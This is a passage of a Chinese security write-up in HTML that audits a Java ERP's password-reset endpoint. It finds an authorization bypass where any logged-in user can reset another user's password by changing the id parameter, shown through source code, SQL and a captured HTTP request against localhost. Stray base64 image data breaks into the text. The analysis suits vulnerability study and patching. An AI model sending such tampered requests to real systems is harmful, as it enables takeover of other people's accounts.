GhImqF/EP1T+rst3Y/dBld8yNoAQ3P6DzecqrxmheG9/6yAYEsLl+K3E5X3avNXnEs/z/72df4L6RUin9//Z+r45Pyhjprzr56TSrdoT/yOl9h6o0frc7b5feOEl/dfqlbp4Ufrhv88KtJJW9c6WTerf3/vAned/9h96/mf/4bb90KHDmnTPD1qyNAAAAAAAAFwhgh+em+MlrCM+XHka59FUxoiUJqxwjEO5ZI5O446uI0qc3b+pGXeoNM93XUbdjq5v6/iN0RmPacjQH2nSmT+bIbaXs1juxTHjuyTAB1I22n2yVkOGxin1qcd0m23MR7dO10kdHftSbessD4u98LVszfGea0oI1/X6h/5uD/hL6/T1OJfX3a5XR13nHHPi68IeOEfdnP68MWAvLT+tkb3j1G/SLdrtbbb+pSh1drcPfUxzbrGPvQkC52z8Mo//rjjn79dUuF3T19+2eOaZOTrw6WeSZBnh0pa8/vqfFR0V5bb9fz/0Y3Xq1EkNDQ36z1Wvu+2vr29ojfIAAAAAAABwBQhqeG7OqfY5H9z3OJdGn6vu67HS9eGy5n9ddH1HL0vOfK0L6q7ru9nqCu+oZrWGezI6yhH8u96f2ekbpdH6IIC6jZEm71kC7915JYp6KtExF708wHsxO5ObMZZk91/1kjGbe+hjmjPUNis7gDnvHl1KTZJ8/fDiy+hEx9zxjs57sYiMU4I+b4G/6fC5Nq/8vPEHlKceU6rb7Pi2wz7j3D4Dva1Y99f1Hrfv3btPeW/m6pln5mv7u/mtXBUAAAAAAACuJN8J2plG36/U3tfp9P7f+w5cje7gk/6D1TMN/5A6Xi9Lfuytg1lydDFLuj78Fsvmbp2uk05Xt8zYDg+aXLcnAd5LQnyEOl6o0Keebs5egxe7836vl373nsovSBHRdzTeQ0RUs54P672m69x+DHD8GOHC+QNIVJMv7HhQ6IVj7+ml3/3e+r/9tVLHCMV7nwJy6Uq36k8tcS2f78fnqvta6hgZJ/vlEsI7ShdOq9wlwff0cNAXXnhJHTp0sMxAbw/q6+pDXQIAAAAAAAAuc0ELz40xHW/6SagT4iPUUbWq9njcHXrwqcc0J8MR4JZuPqLT6q4hztfSLZo0Kk4dTx+xjDqZ89T9zpD3A3167B/q2HuEJhlp4uj7HeNRSlxGrDz1mB6eZA2lvbPWpN3Vtpoc5xzZ+zpdOHZQuwOq+3OV19jqlDQ6I1ER5gzxAO7FmCPuaWxH+WldUHf1M+/TWYPLMaMz7vcajhvrLfepO/TgrAluQa39/fJYU+lWlZ2WIob+yOWeHQ9JtV64Qn+/IEUMtdY2OsN1nePhqx1dHxo7OkoR3n6c2F2t07pO8Yl3uO+7VAkT9KCv79KZr3XB9qNBwqQfaY7L+2j9DtuY75vrfucDQ+WYQ3+hY5xGutbg/D6e/ryx+z113PcleX44qBGgG8cAAAAAAAAACNrYFsfsZXW0PvzS4DoKxO0hlT59oDd/Jz34lMt5/YwSKd38Z2nSj5Rqzsy2zhW/dB/ozd+d06RZY60P+rTMDPdfd+nmP6t09P2aY3noaIW2/64x8PR7L8YIGU+zvM1RMmM156mxjrX7K3RhaOPDOXeXfK2Hn3pMQ8ybcKmxdKv+VHqH9R6c41R
<h2 id=toc-18>越权漏洞</h2>
<h3 id=toc-19>重置密码</h3>
<h4>分析</h4>
<p>根据路径找到对应的路由</p>
<div class=highlight><pre><span></span><span class=nd>@PostMapping</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=s>"/resetPwd"</span><span class=o>)</span>
<span class=kd>public</span> <span class=n>String</span> <span class=nf>resetPwd</span><span class=o>(</span><span class=nd>@RequestParam</span><span class=o>(</span><span class=s>"id"</span><span class=o>)</span> <span class=n>Long</span> <span class=n>id</span><span class=o>,</span>
<span class=n>HttpServletRequest</span> <span class=n>request</span><span class=o>)</span> <span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>&gt;</span> <span class=n>objectMap</span> <span class=o>=</span> <span class=k>new</span> <span class=n>HashMap</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>&gt;();</span>
<span class=c1>// 初始密码</span>
<span class=n>String</span> <span class=n>password</span> <span class=o>=</span> <span class=s>"123456"</span><span class=o>;</span>
<span class=n>String</span> <span class=n>md5Pwd</span> <span class=o>=</span> <span class=n>Tools</span><span class=o>.</span><span class=na>md5Encryp</span><span class=o>(</span><span class=n>password</span><span class=o>);</span>
<span class=c1>// 重置操作</span>
<span class=kt>int</span> <span class=n>update</span> <span class=o>=</span> <span class=n>userService</span><span class=o>.</span><span class=na>resetPwd</span><span class=o>(</span><span class=n>md5Pwd</span><span class=o>,</span> <span class=n>id</span><span class=o>);</span>
<span class=k>if</span><span class=o>(</span><span class=n>update</span> <span class=o>&gt;</span> <span class=mi>0</span><span class=o>)</span> <span class=o>{</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=n>message</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span> <span class=k>else</span> <span class=o>{</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=n>message</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>ERROR</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span>
<span class=o>}</span>
</pre></div>
<p>对应userService的resetPwd方法</p>
<div class=highlight><pre><span></span><span class=nd>@Transactional</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=s>"transactionManager"</span><span class=o>,</span> <span class=n>rollbackFor</span> <span class=o>=</span> <span class=n>Exception</span><span class=o>.</span><span class=na>class</span><span class=o>)</span>
<span class=kd>public</span> <span class=kt>int</span> <span class=nf>resetPwd</span><span class=o>(</span><span class=n>String</span> <span class=n>md5Pwd</span><span class=o>,</span> <span class=n>Long</span> <span class=n>id</span><span class=o>)</span> <span class=kd>throws</span> <span class=n>Exception</span><span class=o>{</span>
<span class=kt>int</span> <span class=n>result</span><span class=o>=</span><span class=mi>0</span><span class=o>;</span>
<span class=n>logService</span><span class=o>.</span><span class=na>insertLog</span><span class=o>(</span><span class=s>"用户"</span><span class=o>,</span>
<span class=k>new</span> <span class=n>StringBuffer</span><span class=o>(</span><span class=n>BusinessConstants</span><span class=o>.</span><span class=na>LOG_OPERATION_TYPE_EDIT</span><span class=o>).</span><span class=na>append</span><span class=o>(</span><span class=n>id</span><span class=o>).</span><span class=na>toString</span><span class=o>(),</span>
<span class=o>((</span><span class=n>ServletRequestAttributes</span><span class=o>)</span> <span class=n>RequestContextHolder</span><span class=o>.</span><span class=na>getRequestAttributes</span><span class=o>()).</span><span class=na>getRequest</span><span class=o>());</span>
<span class=c1>// 根据id获取用户</span>
<span class=n>User</span> <span class=n>u</span> <span class=o>=</span> <span class=n>getUser</span><span class=o>(</span><span class=n>id</span><span class=o>);</span>
<span class=n>String</span> <span class=n>loginName</span> <span class=o>=</span> <span class=n>u</span><span class=o>.</span><span class=na>getLoginName</span><span class=o>();</span>
<span class=c1>// 判断需要重置的是否是admin用户</span>
<span class=k>if</span><span class=o>(</span><span class=s>"admin"</span><span class=o>.</span><span class=na>equals</span><span class=o>(</span><span class=n>loginName</span><span class=o>)){</span>
<span class=n>logger</span><span class=o>.</span><span class=na>info</span><span class=o>(</span><span class=s>"禁止重置超管密码"</span><span class=o>);</span>
<span class=o>}</span> <span class=k>else</span> <span class=o>{</span>
<span class=n>User</span> <span class=n>user</span> <span class=o>=</span> <span class=k>new</span> <span class=n>User</span><span class=o>();</span>
<span class=n>user</span><span class=o>.</span><span class=na>setId</span><span class=o>(</span><span class=n>id</span><span class=o>);</span>
<span class=n>user</span><span class=o>.</span><span class=na>setPassword</span><span class=o>(</span><span class=n>md5Pwd</span><span class=o>);</span>
<span class=k>try</span><span class=o>{</span>
<span class=c1>// 重置操作</span>
<span class=n>result</span><span class=o>=</span><span class=n>userMapper</span><span class=o>.</span><span class=na>updateByPrimaryKeySelective</span><span class=o>(</span><span class=n>user</span><span class=o>);</span>
<span class=o>}</span><span class=k>catch</span><span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>){</span>
<span class=n>JshException</span><span class=o>.</span><span class=na>writeFail</span><span class=o>(</span><span class=n>logger</span><span class=o>,</span> <span class=n>e</span><span class=o>);</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=k>return</span> <span class=n>result</span><span class=o>;</span>
<span class=o>}</span>
</pre></div>
<p>这里没有将当前登陆的用户与需要修改的用户进行比对找到对应的修改SQL语句</p>
<div class=highlight><pre><span></span><span class=nt>&lt;update</span> <span class=na>id=</span><span class=s>"updateByPrimaryKeySelective"</span> <span class=na>parameterType=</span><span class=s>"com.jsh.erp.datasource.entities.User"</span><span class=nt>&gt;</span>
update jsh_user
<span class=nt>&lt;set&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"username != null"</span><span class=nt>&gt;</span>
username = #{username,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"loginName != null"</span><span class=nt>&gt;</span>
login_name = #{loginName,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"password != null"</span><span class=nt>&gt;</span>
password = #{password,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"position != null"</span><span class=nt>&gt;</span>
position = #{position,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"department != null"</span><span class=nt>&gt;</span>
department = #{department,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"email != null"</span><span class=nt>&gt;</span>
email = #{email,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"phonenum != null"</span><span class=nt>&gt;</span>
phonenum = #{phonenum,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"ismanager != null"</span><span class=nt>&gt;</span>
ismanager = #{ismanager,jdbcType=TINYINT},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"isystem != null"</span><span class=nt>&gt;</span>
isystem = #{isystem,jdbcType=TINYINT},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"status != null"</span><span class=nt>&gt;</span>
Status = #{status,jdbcType=TINYINT},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"description != null"</span><span class=nt>&gt;</span>
description = #{description,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"remark != null"</span><span class=nt>&gt;</span>
remark = #{remark,jdbcType=VARCHAR},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"tenantId != null"</span><span class=nt>&gt;</span>
tenant_id = #{tenantId,jdbcType=BIGINT},
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;/set&gt;</span>
where id = #{id,jdbcType=BIGINT}
<span class=nt>&lt;/update&gt;</span>
</pre></div>
<p>where条件中只根据id查询</p>
<h4>测试</h4>
<p>用户原始密码</p>
<p><a id=img27 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233607-9e122b88-c117-1.png><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABC4AAADYCAYAAAAkq6KxAAB3VElEQVR4nO3df3gU130v/vfs6hdIgBrzQ+A4GLGLAOPGJgkJUkKbayNbIrlAUzD33lyjXNuSSW6tdWyehtRO28Sp3Ic6XtE2shT7G/DjtrZpCjQgxRLctLQSMYkxrmVA7CJMHPPbyQqQrR+7O98/ZmZ3ZnZ+7WpXWknv1/PsA9qdOXNmzplfnznnjDAwMCCC0u69997DrFmzxjobREQjcuXKFXg8nrHOBhERERFNYq6xzgARERERERERkRkGLoiIiIiIiIgoazFwQURERERERERZK+e9994b6zwQEVEWCwaDY50FIiIiIprEhFAoxME5iYiIiIiIiCgrsasIEREREREREWUtBi6IiIiIiIiIKGsxcEFEREREREREWYuBCyIiIiIiIiLKWgxcEBEREREREVHWYuCCiIiIiIiIiLIWAxdZ5sqVK2OdBSIaYzwOEBERERHFMXBBRERERERERFmLgQsiIiIiIiIiyloMXBARERERERFR1mLggoiIiIiIiIiyFgMXRERERERERJS1cqx+vHbtGnp6enDu3Dlcu3YNH374IQBg6tSpmD59OubPn4+ysjJMnz59VDJL1qLRKI4cOYKTJ0/ixo0bCb/ffvvt+OIXvwiXi/GqyehTe6fhjXXXxzobGffuu+/i4MGDmn3gLz7254bT/sVv/zL2/6KiItx999249dZbM53FjLE7BgDSei5ZsgQrV66cEMeCybjOAHDu3DmcPXsWFy5cQH9/PwYGBgAABQUFKCwsRElJCUpLSzF//vwxzunE8r3jBXjuZB4eXjKEJ+8YGOvsEBERTRpCKBQSjX5466238NZbb+G2227DvHnzMGPGDOTn5wMABgcH0dfXh/Pnz+Odd97BJz/5SXzyk58c1YxPVFeuXMGsWbNSmrezsxNXr17F3XffjcLCQs1vfr8fH//4xxGNRvGlL30JU6dOTUd2x52uri688cYbiEQijqZ3u9341Kc+hfLy8gznLPOKX5yB0P19sb937dqF3/3ud4bT/t7v/R42b948WllLq+effz4hAKFfd6Pvzp49i0OHDuHBBx8crayaSvU4YHUMUPT39+PgwYOYOXMmKioqRprVMTcZ13nfvn0oKCjAokWLUFxcjMLCQuTkSM8hwuEw+vv7EQqFcPr0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
<p>现在登陆jsh用户尝试重置test123用户密码</p>
<p><a id=img28 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233617-a43350f0-c117-1.png><img src=data:image/png;base64,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
<p>抓包</p>
<pre><code>POST /user/resetPwd HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/pages/manage/user.html
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1706618997,1706707611,1706717491; JSESSIONID=30DAE0DC23EE5303A1CFE03DD4394A2F; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1706781674
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
id=63</code></pre>
<p>这里只传递了userId尝试对userId进行修改再发送请求</p>
<p><a id=img29 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233631-ac745188-c117-1.png><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABfsAAAIyCAYAAAB8XRCxAAEAAElEQVR4nOz9d3hc5bXwf3+n9yKNRr2NuqtsuTdsXADTWyAklFSe9OQhh/zy5pyc9PMkOaSHFNIhoYdmgwFjY2OMjYtcZVu9l1Gf0Wh6ef+QNdjYGBlcYX2ui+tCe3ZZe2t7tO+173vdikQikUAIIYQQQgghhDjLQqEQO7dupWLqVNLS0893OEIIIYQQHyjK8x2AEEIIIYQQQgghhBBCCCHeH0n2CyGEEEIIIYQQQgghhBAXOUn2CyGEEEIIIYQQQgghhBAXOUn2CyGEEEIIIYQQQgghhBAXOUn2CyGEEEIIIYQQQgghhBAXOUn2CyGEEEIIIYQQQgghhBAXOUn2CyGEEEIIIYQQQgghhBAXOUn2CyGEEEIIIYQQQgghhBAXOUn2CyGEEEIIIYQQQgghhBAXOUn2CyGEEEIIIYQQQgghhBAXOUn2CyGEEEIIIYQQQgghhBAXOUn2CyGEEEIIIYQQQgghhBAXOUn2CyGEEEIIIYQQQgghhBAXOUn2CyGEEEIIIYQQQgghhBAXOUn2CyGEEEIIIYQQQgghhBAXOUn2CyGEEEIIIYQQQgghhBAXOUn2CyGEEEIIIYQQQgghhBAXOUn2CyGEEEIIIYQQQgghhBAXOUn2CyGEEEIIIYQQQgghhBAXOfWpPgwPtdGz70Ue3+7GF4yddB1byTymzlnMqnLLWQnwohDooK2mmvWv1MH8W7isMpO8FO35jkoIIYQQQgghPpACHdXUVL/B2ur+d1wnreoaFlZNpirXcA4jE0IIIYQ4f06Z7I8MtdGx+QH+9+cH6PWGT7pO2syrueSmCNy4kCUlqeg1H7bBAh7cNVvY8Le/8fN/7sNyzwLK8x2S7BdCCCGEEEKIs8Tfvofdz93P9/5y5B3XyV3Vxw0fuZXoqkr